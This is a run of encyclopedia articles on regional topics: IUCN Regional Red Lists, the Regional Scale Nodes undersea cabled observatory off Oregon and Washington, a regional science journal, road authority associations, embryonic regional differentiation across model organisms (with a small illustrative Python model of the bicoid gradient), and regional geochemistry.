The IUCN Categories and Criteria were initially designed to assess the conservation status of species globally, however there was a demand for guidelines to apply the system at the regional level. In 2003, IUCN developed a set of transparent, quantitative criteria to assess the conservation status of species at the regional and national level. This approach is now being applied in many countries throughout the world.
Recently, Regional Red Lists have been completed for Mongolian Mammals and Fishes. These have also been accompanied by Summary Conservation Action Plans, detailing recommended conservation measures for each threatened species.
A Regional Red List may be created by any country or organisation by following the clear, repeatable protocol. The process is as follows:
In April 2002 at the Convention on Biological Diversity (CBD), 188 nations committed themselves to actions to “…achieve, by 2010, a significant reduction of the current rate of biodiversity loss at the global, regional and national levels…”.
When a Regional Red List is compiled at regular intervals, it can provide information about how the status of the region's biodiversity is changing over time. This information may be useful to policy makers, conservationists, and the general public, as it may assist countries in meeting their obligation to the CBD.
Currently, a global network of countries and individuals working on Regional Red Lists is being developed. This will include a centralised online database where Regional Red List assessments and Action Plans can be stored, managed, and made accessible. With this regional network there will be opportunities to learn from each other's experiences in applying the IUCN Categories and Criteria and in using this information for conservation planning and priority setting.
Two public bodies in Britain, Natural England and the Joint Nature Conservation Committee (JNCC), have produced British Red Data Books and other reviews of different plants and animals assigning their conservation status according to IUCN Red Data Book criteria. [ 1 ] In 2016 the JNCC produced a spreadsheet which incorporated these reviews and lists of threatened species based on other criteria such as Biodiversity Action Plan Priority Lists and Schedules of the Wildlife & Countryside Act . [ 2 ]
Natural England uses the following definitions for uncommon species not rare enough to be included in the Red Data Book: | https://en.wikipedia.org/wiki/Regional_Red_List |
The National Science Foundation's (NSF) Ocean Observatories Initiative (OOI) Regional Scale Nodes (RSN) component is an electro-optically cabled underwater observatory that directly connects to the global Internet . It is the largest cable-linked seabed observatory in the world , and also the first of its kind in the United States .
Located on the southern part of the Juan de Fuca Plate , off the coast of Washington and Oregon , it is the first ocean observatory to span a tectonic plate .
RSN utilizes several high-power , high-bandwidth sub-sea terminals called primary nodes which are linked together by fiber-optic cable and provide support to oceanographic sensors at key locations .
Upon completion of the network in 2014, RSN will cover a distance of over 900 kilometers at depths of up to 3000 meters. Implementation of the OOI Regional Scale Nodes is led by the University of Washington's (UW) School of Oceanography , the UW Applied Physics Laboratory , and L-3 MariPro .
Live RSN data from >100 seafloor and water column instruments will be made available live on the Internet. This will allow both scientists and the general public to study long-term changes in ocean systems over the next 25 years.
Construction of RSN will be completed in 2014. Efforts are substantially aided by the crews of ROPOS (Remotely Operated Platform for Observation Sciences). The 83-day VISIONS ’14 expedition aboard the 274-foot global-class R/V Thomas G. Thompson is responsible for the observatory's final implementation.
The Regional Scale Nodes (RSN) is a component of the National Science Foundation's (NSF's) Ocean Observatories Initiative (OOI). The NSF's OOI is managed and coordinated by the OOI Project Office at the Consortium for Ocean Leadership (COL) in Washington, D.C. The UW, located in Seattle , Washington, is the RSN Implementing Organization for the COL.
The vision behind RSN is to launch a new era of scientific discovery and understanding of the oceans.
The RSN consists of two infrastructures : primary and secondary. The primary infrastructure network, which was designed, qualified, manufactured, and installed in 2012 by L-3 Maripro , consists of a shore facility located in Pacific City, Oregon ; two fiber-optic cable lines covering a distance of 800 kilometers, and seven primary science nodes.
The RSN system delivers 200 kilowatts of power and 240Gbit/s of TCP/IP Internet data communications to the seven primary science nodes. RSN is designed to last for 25 years and is capable of significant expansion to serve future science needs.
Prior to the emergence of underwater cabled observatories, oceanographers and other researchers studying the global ocean tended to rely on the use of research vessels and crewed submersibles in order to collect data. This was followed by a shift toward Remote Operated Vehicles (ROV's) and space-based research satellites . The limitation to these methods was that they were either not cost-effective, or data could only be collected for short durations. While the importance of expedition-based exploration was recognized, a solution was needed.
In 1987, the concept of utilizing high-power, high-bandwidth underwater cabled observatories emerged as a long-term, cost-effective solution for conducting real-time monitoring of ocean systems.
In the early 1990s, the United States and Canada formed an agreement to develop a plate-scale submarine electro-optically cabled ocean observatory in the northeast Pacific Ocean. This region is home to the smallest of Earth's tectonic plates – the Juan de Fuca plate. The small size and close coastal proximity of the Juan de Fuca plate presents a unique opportunity to observe the dynamic systems in submarine volcano regions.
The partnership between the U.S. and Canada developed into a plan to build a Canadian cabled array that would cover the upper 1/3 of the Juan de Fuca plate, and a U.S. system spanning the lower 2/3 of the plate. Together, this plate-scale observatory would be called NEPTUNE (Northeast Pacific Time Series Underwater Networked Experiments) and would provide continuous observations for 25 years.
By the mid-2000s, NEPTUNE Canada had received full funding and their cabled array was completed and online by 2009. It was brought under the umbrella network of Ocean Networks Canada (ONC). Meanwhile, NEPTUNE U.S. was renamed to Regional Scale Nodes and became a component of the OOI. It is slated for completion in 2014. Both NEPTUNE Canada and RSN will be integrated through the ONC's digital infrastructure and the OOI Cyberinfrastructure providing real-time access to anyone connected to the Internet.
"The goal of the program is to launch an era of scientific discovery and understanding across and within the ocean basins, utilizing widely accessible, interactive telepresence. It's a new world. We will be present throughout the volume of the ocean, at will, communicating in real time...So what can we actually do tomorrow? We're about to ride the wave of technological opportunity. There are emerging technologies throughout the field around oceanography, which we will incorporate into oceanography, and through that convergence, we will transform oceanography into something even more magical."
The scientific goals of RSN are significant. A vast array of natural phenomena that occur throughout the world's oceans and seafloor are found in the Northeast Pacific Ocean. As a whole, the mission of RSN is to provide a human telepresence in the ocean that will serve researchers, students, educators, policymakers, and the public. Scientists will be able to conduct local investigations of such global processes as major ocean currents , active earthquake zones, creation of new seafloor , and rich environments of marine plants and animals .
RSN is also designed to help anticipate both short and long-term ocean-generated threats and opportunities. Notably, RSN will be able to monitor the tectonic activity along the plate boundary . There is hope that seismic sensors could be installed at key areas along the spreading center which would serve as an early warning system for earthquakes and tsunamis .
The existence of a long-term cabled observatory will allow for long-term measurements of biological communities . In particular, the Juan de Fuca plate's divergent plate boundary has resulted in the existence of seafloor hydrothermal vents ecosystems, and other similar groups. These deep sea communities , thriving in extremely harsh environments, pose a number of unsolved scientific questions which RSN will be capable of investigating.
Primary Infrastructure
The primary infrastructure of RSN consists of seven primary nodes which were installed in 2012 by L-3 Maripro . They are terminal points which help distribute power and bandwidth to the networks of deployed sensors.
Approximately 900 kilometers of cable (referred to as backbone cable) have been used to connect the primary nodes together. These cables make landfall at the shore station in Pacific City, Oregon.
In 2005, over 175 scientists across the United States responded to a Request for Assistance from the National Science Foundation to develop a cabled observatory on the Juan de Fuca Plate. Nodes are located at pre-selected experimental sites throughout the Juan de Fuca plate. Axial Seamount , Hydrate Ridge on the Cascadia Margin and shallow water sites west of Newport, Oregon (the Endurance Array) all have primary nodes installed. The primary nodes are all located in environmentally benign areas.
Nodes also convert the 10 kVdc voltage from the backbone cable to 375 Vdc, which is then directed to the secondary infrastructure. The 375 V switching systems and node telemetry systems were designed and manufactured by Texcel Technology Plc, based in England. The software to manage the ports and telemetry protection systems was also supplied by Texcel as an element manager sitting under a Network Management System (NMS).
The primary nodes have a number of extra ports which offer the potential for large-scale future expansion (>100 kilometers).
Secondary Infrastructure
The converted 375 Vdc voltage from the primary nodes is then directed to low- and medium-power nodes and junction boxes. The nodes and junction boxes (similar to power strips) offer direct power and communications to the instruments at the experimental sites. Together, these components make up the RSN secondary infrastructure.
Extension cables are used to link the primary nodes to the secondary infrastructure, providing power and communications.
Equipment is linked using wet-mate connectors. Different types of cable were installed depending on load requirements, with bandwidths ranging from 1 Gbit/s to 10 Gbit/s.
During the VISIONS ’13 expedition to continue construction of RSN, over 22,000 meters of extension cables were installed on the ocean floor. The cables all successfully went online.
Upon completion in 2014, over 100 cabled seafloor and water column instruments will be operational. These instruments will allow monitoring of biological, chemical, geological, and geophysical processes in the ocean. The secondary infrastructure will also include six mooring systems for water-column profilers.
Submarine cables are routinely deployed in ocean basins and along continental margins around the world, and they have long service lifetimes. The backbone cable was installed in the summer of 2011. The commercial cable-laying ship TE SubCom Dependable carried out this phase of the project.
Special environmental requirements were also taken into account. Certain cables are heavily armored, especially those deployed in volcanic areas such as Axial Seamount.
In order to fully understand complex ocean systems, a wide variety of sensor arrays, capable of surviving for long periods of time in harsh conditions, are necessary. A suite of more than 100 sensors was selected and strategically placed throughout RSN. They are located at Axial Seamount, Hydrate Ridge, and on the water-column moorings.
Instruments connected to the RSN include:
The instruments are the endpoints of each regional network branch.
The Regional Scale Nodes network is connected to the OOI Cyberinfrastructure.
The Cyberinfrastructure component of the OOI links marine infrastructure to scientists and users. The OOI Cyberinfrastructure manages and integrates data from all the different OOI sensors. It will provide a common operating infrastructure, the Integrated Observatory Network (ION), connecting and coordinating the operations of the marine components (global, regional, and coastal scale arrays). It will also provide resource management, observatory mission command and control, product production, data management and distribution (including strong data provenance), and centrally available collaboration tools.
The Integrated Observatory Network (ION) connects and coordinates the operations of the OOI marine components with the scientific and educational pursuits of oceanographic research communities. The cyberinfrastructure is being designed and constructed by the University of California, San Diego .
Construction of RSN is ongoing. As of September 19, 2014, the primary infrastructure and most of the secondary infrastructure were in place, and OOI RSN and UW APL crews were working to complete the vertical moorings for the shallow profiler.
The University of Washington has welcomed student participation in the implementation of RSN. As of 2014, there have been eight expeditions in which students have had the opportunity to work aboard the R/V Thomas G. Thompson and witness the construction of the cabled observatory. During these cruises, students develop projects utilizing the array of technology and scientific equipment on board.
Students who participate in these expeditions go on to share their experiences with others.
In 2014, over 30 graduate and undergraduate students worked alongside the researchers, engineers, educators, and crew during the 83-day VISIONS ’14 expedition. | https://en.wikipedia.org/wiki/Regional_Scale_Nodes |
Regional Science Policy & Practice (RSPP) is a peer-reviewed academic journal published by Wiley-Blackwell on behalf of the Regional Science Association International; since 2019 it has published six issues per year. It was established in 2008 and covers regional science topics from disciplines such as planning, economics, environmental science, geography, and public policy.
| https://en.wikipedia.org/wiki/Regional_Science_Policy_and_Practice |
This article lists the main regional associations for road authorities from around the world. Many of these are associated with the World Road Association . | https://en.wikipedia.org/wiki/Regional_associations_of_road_authorities |
In the field of developmental biology , regional differentiation is the process by which different areas are identified in the development of the early embryo . [ 1 ] The process by which the cells become specified differs between organisms .
In terms of developmental commitment, a cell can either be specified or it can be determined. Specification is the first stage in differentiation. [ 2 ] A cell that is specified can have its commitment reversed while the determined state is irreversible. [ 3 ] There are two main types of specification: autonomous and conditional. A cell specified autonomously will develop into a specific fate based upon cytoplasmic determinants with no regard to the environment the cell is in. A cell specified conditionally will develop into a specific fate based upon other surrounding cells or morphogen gradients. Another type of specification is syncytial specification, characteristic of most insect classes. [ 2 ]
Specification in sea urchins uses both autonomous and conditional mechanisms to determine the anterior/posterior axis. The anterior/posterior axis lies along the animal/vegetal axis set up during cleavage. The micromeres induce the nearby tissue to become endoderm while the animal cells are specified to become ectoderm. The animal cells are not determined because the micromeres can induce the animal cells to also take on mesodermal and endodermal fates. It was observed that β-catenin was present in the nuclei at the vegetal pole of the blastula. Through a series of experiments, one study confirmed the role of β-catenin in the cell-autonomous specification of vegetal cell fates and the micromeres' inducing ability. [ 4 ] Treatments of lithium chloride sufficient to vegetalize the embryo resulted in increases in nuclear-localized β-catenin. Reduction of expression of β-catenin in the nucleus correlated with loss of vegetal cell fates. Transplants of micromeres lacking nuclear accumulation of β-catenin were unable to induce a second axis.
For the molecular mechanism of β-catenin and the micromeres, it was observed that Notch was present uniformly on the apical surface of the early blastula but was lost in the secondary mesenchyme cells (SMCs) during late blastula and enriched in the presumptive endodermal cells in late blastula. Notch is both necessary and sufficient for determination of the SMCs. The micromeres express the ligand for Notch, Delta, on their surface to induce the formation of SMCs.
The high nuclear levels of β-catenin result from the high accumulation of the Dishevelled protein at the vegetal pole of the egg. Dishevelled inactivates GSK-3 and prevents the phosphorylation of β-catenin. This allows β-catenin to escape degradation and enter the nucleus. The only important role of β-catenin is to activate the transcription of the gene Pmar1. This gene represses a repressor to allow micromere genes to be expressed.
The aboral/oral axis (analogous to the dorsal/ventral axes in other animals) is specified by a nodal homolog. This nodal was localized on the future oral side of the embryo. Experiments confirmed that nodal is both necessary and sufficient to promote development of the oral fate. Nodal also has a role in left/right axis formation.
Tunicates have been a popular choice for the study of regional specification because tunicates were the first organism in which autonomous specification was discovered and tunicates are evolutionarily related to vertebrates.
Early observations in tunicates led to the identification of the yellow crescent (also called the myoplasm). This cytoplasm was segregated to future muscle cells and, if transplanted, could induce the formation of muscle cells. The cytoplasmic determinant macho-1 was isolated as the necessary and sufficient factor for muscle cell formation. Similar to sea urchins, the accumulation of β-catenin in the nuclei was identified as both necessary and sufficient to induce endoderm.
Two more cell fates are determined by conditional specification. The endoderm sends a fibroblast growth factor (FGF) signal to specify the notochord and the mesenchyme fates. Anterior cells respond to FGF to become notochord while posterior cells (identified by the presence of macho-1) respond to FGF to become mesenchyme.
The cytoplasm of the egg not only determines cell fate, but also determines the dorsal/ventral axis. The cytoplasm in the vegetal pole specifies this axis and removing this cytoplasm leads to a loss of axis information. The yellow cytoplasm specifies the anterior/posterior axis. When the yellow cytoplasm moves to the posterior of the egg to become posterior vegetal cytoplasm (PVC), the anterior/posterior axis is specified. Removal of the PVC leads to a loss of the axis while transplantation to the anterior reverses the axis.
In the two-cell stage, the embryo of the nematode C. elegans exhibits mosaic behavior. There are two cells, the P1 cell and the AB cell. The P1 cell was able to make all of its fated cells while the AB cell could only make a portion of the cells it was fated to produce. Thus, the first division gives the autonomous specification of the two cells, but the AB cells require a conditional mechanism to produce all of their fated cells.
The AB lineage gives rise to neurons, skin, and pharynx. The P1 cell divides into EMS and P2. The EMS cell divides into MS and E. The MS lineage gives rise to pharynx, muscle, and neurons. The E lineage gives rise to intestines. The P2 cell divides into P3 and C founder cells. The C founder cells give rise to muscle, skin, and neurons. The P3 cell divides into P4 and D founder cells. The D founder cells give rise to muscle while the P4 lineage gives rise to the germ line.
The anterior/posterior patterning of Drosophila comes from three maternal groups of genes. The anterior group patterns the head and thoracic segments. The posterior group patterns the abdominal segments, and the terminal group patterns the anterior and posterior terminal regions, called the terminalia (the acron in the anterior and the telson in the posterior).
The anterior group genes include bicoid. Bicoid functions as a graded morphogen transcription factor that localizes to the nucleus. The head of the embryo forms at the point of highest concentration of bicoid, and the anterior pattern depends upon the concentration of bicoid. Bicoid works as a transcriptional activator of the gap genes hunchback (hb), buttonhead (btd), empty spiracles (ems), and orthodenticle (otd), while also acting to repress translation of caudal. A different affinity for bicoid in the promoters of the genes it activates allows for concentration-dependent activation: otd has a low affinity for bicoid, while hb has a higher affinity and so will be activated at a lower bicoid concentration. Two other anterior group genes, swallow and exuperantia, play a role in localizing bicoid to the anterior. Bicoid is directed to the anterior by its 3' untranslated region (3'UTR). The microtubule cytoskeleton also plays a role in localizing bicoid.
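The logic of this affinity-based readout can be made concrete with a toy model. The sketch below is purely illustrative: the exponential gradient, the decay length, and the activation thresholds are assumptions chosen to show how a low-affinity target (otd) switches on only near the anterior while a high-affinity target (hb) stays on further back; none of the numbers are measured values.

```python
import math

# Toy model of concentration-dependent activation by the bicoid gradient.
# All parameters below are illustrative assumptions, not measured values.

def bicoid_level(x: float, decay_length: float = 0.2) -> float:
    """Relative bicoid concentration at fractional egg length x (0 = anterior)."""
    return math.exp(-x / decay_length)

# Lower-affinity targets need more bicoid, so they switch on only where the
# gradient is high, i.e. closer to the anterior pole.
ACTIVATION_THRESHOLDS = {
    "otd (low affinity)": 0.5,
    "hb (high affinity)": 0.1,
}

for x in (0.1, 0.3, 0.6):
    level = bicoid_level(x)
    active = [gene for gene, t in ACTIVATION_THRESHOLDS.items() if level >= t]
    print(f"position {x:.1f}: bicoid {level:.2f}, active targets: {active}")
```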
The posterior group genes include nanos. Similar to bicoid, nanos is localized to the posterior pole as a graded morphogen. The only role of nanos is to repress the maternally transcribed hunchback mRNA in the posterior. Another protein, pumilio, is required for nanos to repress hunchback. Other posterior proteins, oskar (which tethers nanos mRNA), Tudor, vasa , and Valois, localize the germ line determinants and nanos to the posterior.
In contrast to the anterior and the posterior, the positional information for the terminalia comes from the follicle cells of the ovary. The terminalia are specified through the action of the Torso receptor tyrosine kinase. The follicle cells secrete Torso-like into the perivitelline space only at the poles. Torso-like cleaves the pro-peptide Trunk, which appears to be the Torso ligand. Trunk activates Torso and causes a signal transduction cascade which represses the transcriptional repressor Groucho, which in turn causes the activation of the terminal gap genes tailless and huckebein.
The patterning from the maternal genes works to influence the expression of the segmentation genes. The segmentation genes are embryonically expressed genes that specify the number, size and polarity of the segments. The gap genes are directly influenced by the maternal genes and are expressed in local and overlapping regions along the anterior/posterior axis. These genes are influenced not only by the maternal genes, but also by epistatic interactions between the other gap genes.
The gap genes work to activate the pair-rule genes. Each pair-rule gene is expressed in seven stripes as a result of the combined effect of the gap genes and interactions between the other pair-rule genes. The pair-rule genes can be divided into two classes: the primary pair-rule genes and the secondary pair-rule genes. The primary pair-rule genes are able to influence the secondary pair-rule genes but not vice versa. The molecular mechanism behind the regulation of the primary pair-rule genes was understood through a complex analysis of the regulation of even-skipped. Both positive and negative regulatory interactions by maternal and gap genes and a unique combination of transcription factors work to express even-skipped in different parts of the embryo. The same gap gene can act positively in one stripe but negatively in another.
The expression of the pair-rule genes translates into the expression of the segment polarity genes in 14 stripes. The role of the segment polarity genes is to define the boundaries and the polarity of the segments. The means by which the genes accomplish this is believed to involve a graded distribution of wingless and hedgehog, or a cascade of signals initiated by these proteins. Unlike the gap and the pair-rule genes, the segment polarity genes function within cells rather than within the syncytium. Thus, segment polarity genes influence patterning through signaling rather than autonomously. Also, the gap and pair-rule genes are expressed transiently, while segment polarity gene expression is maintained throughout development. The continued expression of the segment polarity genes is maintained by a feedback loop involving hedgehog and wingless.
While the segmentation genes can specify the number, size, and polarity of segments, homeotic genes can specify the identity of the segment. The homeotic genes are activated by gap genes and pair-rule genes. The Antennapedia complex and the bithorax complex on the third chromosome contain the major homeotic genes required for specifying segmental identity (actually parasegmental identity). These genes are transcription factors and are expressed in overlapping regions that correlate with their position along the chromosome. These transcription factors regulate other transcription factors, cell surface molecules with roles in cell adhesion, and other cell signals. Later during development, homeotic genes are expressed in the nervous system in a similar anterior/posterior pattern. Homeotic genes are maintained throughout development through the modification of the condensation state of their chromatin. Polycomb genes maintain the chromatin in an inactive conformation while trithorax genes maintain chromatin in an active conformation.
All homeotic genes share a segment of protein with a similar sequence and structure called the homeodomain (the DNA sequence is called the homeobox). This region of the homeotic proteins binds DNA. This domain was found in other developmental regulatory proteins, such as bicoid, as well in other animals including humans. Molecular mapping revealed that the HOX gene cluster has been inherited intact from a common ancestor of flies and mammals which indicates that it is a fundamental developmental regulatory system.
The maternal protein Dorsal functions like a graded morphogen to set the ventral side of the embryo (the name comes from mutations which led to a dorsalized phenotype). Dorsal is like bicoid in that it is a nuclear protein; however, unlike bicoid, dorsal is uniformly distributed throughout the embryo. The concentration difference arises from differential nuclear transport. The mechanism by which dorsal becomes differentially localized to the nuclei occurs in three steps.
The first step happens in the dorsal side of the embryo. The nucleus in the oocyte moves along a microtubule track to one side of the oocyte. This side sends a signal, gurken , to the torpedo receptors on the follicle cells. The torpedo receptor is found in all follicle cells; however, the gurken signal is only found on the anterior dorsal side of the oocyte. The follicle cells change shape and synthetic properties to distinguish the dorsal side from the ventral side. These dorsal follicle cells are unable to produce the pipe protein required for step two.
The second step is a signal from the ventral follicle cells back to the oocyte. This signal acts after the egg has left the follicle cells, so it is stored in the perivitelline space. The follicle cells secrete windbeutel, nudel, and pipe, which create a protease-activating complex. Because the dorsal follicle cells do not express pipe, they are not able to create this complex. Later, the embryo secretes three inactive proteases (gastrulation defective, snake, and Easter) and an inactive ligand (spätzle) into the perivitelline space. These proteases are activated by the complex and cleave spätzle into an active form. This active protein is distributed in a ventral-to-dorsal gradient. Toll is a transmembrane receptor for spätzle and transduces the graded spätzle signal through the cytoplasm to phosphorylate cactus. Once phosphorylated, cactus no longer binds to dorsal, leaving it free to enter the nucleus. The amount of released dorsal depends on the amount of spätzle protein present.
The third step is the regional expression of zygotic genes decapentaplegic ( dpp ), zerknüllt , tolloid , twist , snail , and rhomboid due to the expression of dorsal in the nucleus. High levels of dorsal are required to turn on transcription of twist and snail. Low levels of dorsal can activate the transcription of rhomboid. Dorsal represses the transcription of zerknüllt, tolloid, and dpp. The zygotic genes also interact with each other to restrict their domains of expression.
Between fertilization and the first cleavage in Xenopus embryos, the cortical cytoplasm of the zygote rotates relative to the central cytoplasm by about 30 degrees to uncover (in some species) a gray crescent in the marginal or middle region of the embryo. The cortical rotation is powered by microtubule motors moving along parallel arrays of cortical microtubules. This gray crescent marks the future dorsal side of the embryo. Blocking this rotation prevents formation of the dorsal/ventral axis. By the late blastula stage, Xenopus embryos have a clear dorsal/ventral axis.
In the early gastrula, most of the tissue in the embryo is not determined. The one exception is the anterior portion of the dorsal blastopore lip. When this tissue was transplanted to another part of the embryo, it developed as it normally would. In addition, this tissue was able to induce the formation of another dorsal/ventral axis. Hans Spemann named this region the organizer and the induction of the dorsal axis the primary induction.
The organizer is induced from a dorsal vegetal region called the Nieuwkoop center . There are many different developmental potentials throughout the blastula stage embryos. The vegetal cap can give rise to only endodermal cell types while the animal cap can give rise to only ectodermal cell types. The marginal zone, however, can give rise to most structures in the embryo including mesoderm . A series of experiments by Pieter Nieuwkoop showed that if the marginal zone is removed and the animal and vegetal caps placed next to each other, the mesoderm comes from the animal cap and the dorsal tissues are always adjacent to the dorsal vegetal cells. Thus, this dorsal vegetal region, named the Nieuwkoop center, was able to induce the formation of the organizer.
Twinning assays identified Wnt proteins as molecules from the Nieuwkoop center that could specify the dorsal/ventral axis. In twinning assays, molecules are injected into the ventral blastomere of a four-cell stage embryo. If the molecules specify the dorsal axis, dorsal structures will be formed on the ventral side. Wnt proteins were not necessary to specify the axis, but examination of other proteins in the Wnt pathway led to the discovery that β-catenin was necessary. β-catenin is present in the nuclei on the dorsal side but not on the ventral side. β-catenin levels are regulated by GSK-3. When active, GSK-3 phosphorylates free β-catenin, which is then targeted for degradation. There are two possible molecules that might regulate GSK-3: GBP (GSK-3 Binding Protein) and Dishevelled . The current model is that these act together to inhibit GSK-3 activity. Dishevelled is able to induce a secondary axis when overexpressed and is present at higher levels on the dorsal side after cortical rotation ( Symmetry Breaking and Cortical Rotation ). Depletion of Dishevelled, however, has no effect. GBP has an effect both when depleted and overexpressed. Recent evidence, however, showed that Xwnt11, a Wnt molecule expressed in Xenopus , was both sufficient and necessary for dorsal axis formation. [ 5 ]
Mesoderm formation comes from two signals: one for the ventral portion and one for the dorsal portion. Animal cap assays were used to determine the molecular signals from the vegetal cap that are able to induce the animal cap to form mesoderm. In an animal cap assay, molecules of interest are either applied in the medium that the cap is grown in or injected as mRNA in an early embryo. These experiments identified a group of molecules, the transforming growth factor-β (TGF-β) family. With dominant negative forms of TGF-β, early experiments were only able to identify the family of molecules involved, not the specific member. Recent experiments have identified the Xenopus nodal-related proteins (Xnr-1, Xnr-2, and Xnr-4) as the mesoderm-inducing signals. Inhibitors of these ligands prevent mesoderm formation, and these proteins show a graded distribution along the dorsal/ventral axis.
Vegetally localized mRNAs, VegT and possibly Vg1, are involved in inducing the endoderm. It is hypothesized that VegT also activates the Xnr-1,2,4 proteins. VegT acts as a transcription factor to activate genes specifying endodermal fate while Vg1 acts as a paracrine factor.
β-catenin in the nucleus activates two transcription factors: siamois and twin. β-catenin also acts synergistically with VegT to produce high levels of Xnr-1,2,4. Siamois will act synergistically with Xnr-1,2,4 to activate a high level of the transcription factors such as goosecoid in the organizer. Areas in the embryo with lower levels of Xnr-1,2,4 will express ventral or lateral mesoderm. Nuclear β-catenin works synergistically with the mesodermal cell fate signal to create the signaling activity of the Nieuwkoop center to induce the formation of the organizer in the dorsal mesoderm.
There are two classes of genes that are responsible for the organizer's activity: transcription factors and secreted proteins. Goosecoid (whose name reflects its homology to both gooseberry and bicoid) is the first known gene to be expressed in the organizer and is both sufficient and necessary to specify a secondary axis.
The organizer induces ventral mesoderm to become lateral mesoderm, induces the ectoderm to form neural tissue and induces dorsal structures in the endoderm. The mechanism behind these inductions is an inhibition of the bone morphogenetic protein 4 signaling pathway that ventralizes the embryo. In the absence of these signals, ectoderm reverts to its default state of neural tissue. Four of the secreted molecules from the organizer, chordin, noggin, follistatin and Xenopus nodal-related-3 (Xnr-3), directly interact with BMP-4 and block its ability to bind to its receptor. Thus, these molecules create a gradient of BMP-4 along the dorsal/ventral axis of the mesoderm.
BMP-4 mainly acts in trunk and tail region of the embryo while a different set of signals work in the head region. Xwnt-8 is expressed throughout the ventral and lateral mesoderm. The endomesoderm (can give rise to either endoderm or mesoderm) at the leading edge of the archenteron (future anterior) secrete three factors Cerberus , Dickkopf, and Frzb . While Cerberus and Frzb bind directly to Xwnt-8 to prevent it from binding to its receptor, Cerberus is also capable of binding to BMP-4 and Xnr1. [ 6 ] Furthermore, Dickkopf binds to LRP-5, a transmembrane protein important for the signalling pathway of Xwnt-8, leading to endocytosis of LRP-5 and eventually to an inhibition of the Xwnt-8 pathway.
The anterior/posterior patterning of the embryo occurs sometime before or during gastrulation. The first cells to involute have anterior inducing activity while the last cells have posterior inducing activity. The anterior inducing ability comes from the Xwnt-8 antagonizing signals Cerberus, Dickkopf and Frzb discussed above. Anterior head development also requires the function of IGFs (insulin-like growth factors) expressed in the dorsal midline and the anterior neural tube. It is believed that IGFs function by activating a signal transduction cascade that interferes with and inhibits both Wnt signaling and BMP signaling. In the posterior, two candidates for posteriorizing signals include eFGF, a fibroblast growth factor homologue, and retinoic acid.
The basis for axis formation in zebrafish parallels what is known in amphibians. The embryonic shield has the same function as the dorsal lip of the blastopore and acts as the organizer. When transplanted, it is able to organize a secondary axis and removing it prevents the formation of dorsal structures. β-catenin also has a role similar to its role in amphibians. It accumulates in the nucleus only on the dorsal side; ventral β-catenin induces a secondary axis. It activates the expression of Squint (a Nodal related signaling protein aka ndr1) and Bozozok (a homeodomain transcription factor similar to Siamois) which act together to activate goosecoid in the embryonic shield.
As in Xenopus, mesoderm induction involves two signals: one from the vegetal pole to induce ventral mesoderm and one from the Nieuwkoop center equivalent dorsal vegetal cells to induce dorsal mesoderm.
The signals from the organizer also parallel those from amphibians. Noggin and the chordin homologue Chordino bind to a BMP family member, BMP2B, to block it from ventralizing the embryo. Dickkopf binds to a Wnt homolog, Wnt8, to block it from ventralizing and posteriorizing the embryo.
There is a third pathway regulated by β-catenin in fish. β-catenin activates the transcription factor stat3. Stat3 coordinates cell movements during gastrulation and contributes to establishing planar polarity.
The dorsal/ventral axis is defined in chick embryos by the orientation of the cells with respect to the yolk. Ventral is down, toward the yolk, while dorsal is up. This axis is defined by the creation of a pH difference between the "inside" and "outside" of the blastoderm, that is, between the subgerminal space and the albumin on the outside. The subgerminal space has a pH of 6.5 while the albumin on the outside has a pH of 9.5.
The anterior/posterior axis is defined during the initial tilting of the embryo when the eggshell is being deposited. The egg is constantly being rotated in a consistent direction and there is a partial stratification of the yolk; the lighter yolk components will be near one end of the blastoderm and will become the future posterior. The molecular basis of the posterior is not known, however, the accumulation of cells eventually results in the posterior marginal zone (PMZ).
The PMZ is the equivalent of the Nieuwkoop center in that its role is to induce Hensen's node. Transplantation of the PMZ results in induction of a primitive streak; however, the PMZ does not contribute to the streak itself. Similar to the Nieuwkoop center, the PMZ expresses both Vg1 and nuclear-localized β-catenin.
Hensen's node is equivalent to the organizer. Transplantation of Hensen's node results in the formation of a secondary axis. Hensen's node is the site where gastrulation begins and it becomes the dorsal mesoderm. Hensen's node is formed by induction from the PMZ acting on the anterior part of the PMZ, called Koller's sickle. When the primitive streak forms, these cells expand out to become Hensen's node. These cells express goosecoid, consistent with their role as the organizer.
The function of the organizer in chick embryos is similar to that in amphibians and fish; however, there are some differences. Similar to the amphibians and fish, the organizer does secrete Chordin, Noggin and Nodal proteins that antagonize BMP signaling and dorsalize the embryo. Neural induction, however, does not rely entirely on inhibiting BMP signaling: overexpression of BMP antagonists is not enough to induce the formation of neurons, nor does overexpressing BMP block the formation of neurons. While the whole story of neural induction is not yet known, FGFs seem to play a role in mesoderm and neural induction. The anterior/posterior patterning of the embryo requires signals like cerberus from the hypoblast and the spatial regulation of retinoic acid accumulation to activate the 3' Hox genes in the posterior neuroectoderm (hindbrain and spinal cord).
The earliest specification in mouse embryos occurs between the trophoblast and the inner cell mass, in the outer polar cells and the inner apolar cells respectively. These two groups become specified at the eight-cell stage during compaction, but do not become determined until they reach the 64-cell stage. If an apolar cell is transplanted to the outside during the 8–32 cell stage, that cell will develop as a trophoblast cell.
The anterior/posterior axis in the mouse embryo is specified by two signaling centers. In the mouse embryo, the egg forms a cylinder with the epiblast forming a cup at the distal end of that cylinder. The epiblast is surrounded by the visceral endoderm, the equivalent of the hypoblast of humans and chicks. Signals for the anterior/posterior axis come from the primitive node . The other important site is the anterior visceral endoderm (AVE). The AVE lies anterior to the node's most anterior position and lies just under the epiblast in the region that will become occupied by migrating endomesoderm to form head mesoderm and foregut endoderm. The AVE interacts with the node to specify the most anterior structures. Thus, the node is able to form a normal trunk, but requires signals from the AVE to form a head.
The discovery of the homeobox in Drosophila flies and its conservation in other animals has led to advancements in understanding anterior/posterior patterning. Most of the Hox genes in mammals show an expression pattern that parallels that of the homeotic genes in flies. In mammals, there are four copies of the Hox genes. Each set of Hox genes is paralogous to the others (Hox1a is a paralogue of Hox1b, etc.). These paralogs show overlapping expression patterns and could act redundantly. However, double mutations in paralogous genes can also act synergistically, indicating that the genes must work together for function. | https://en.wikipedia.org/wiki/Regional_differentiation |
Regional geochemistry is the study of the spatial variation in the chemical composition of materials at the surface of the Earth , on a scale of tens to thousands of kilometres. Important parameters to consider when designing or evaluating a geochemical survey are:
Garrett et al. (2008) describe how the discipline has evolved from its beginnings in Russia in the 1930s. The first surveys were aimed at mineral exploration. In recent years, many surveys have emphasised a more broad-based environmental mapping approach. Numerous government agencies around the world have initiated multi-year systematic geochemical mapping projects, aimed at producing baseline geochemical maps of very large areas. See, for example, the description by Johnson et al. (2005) of the British Geological Survey’s G-BASE project.
| https://en.wikipedia.org/wiki/Regional_geochemistry |
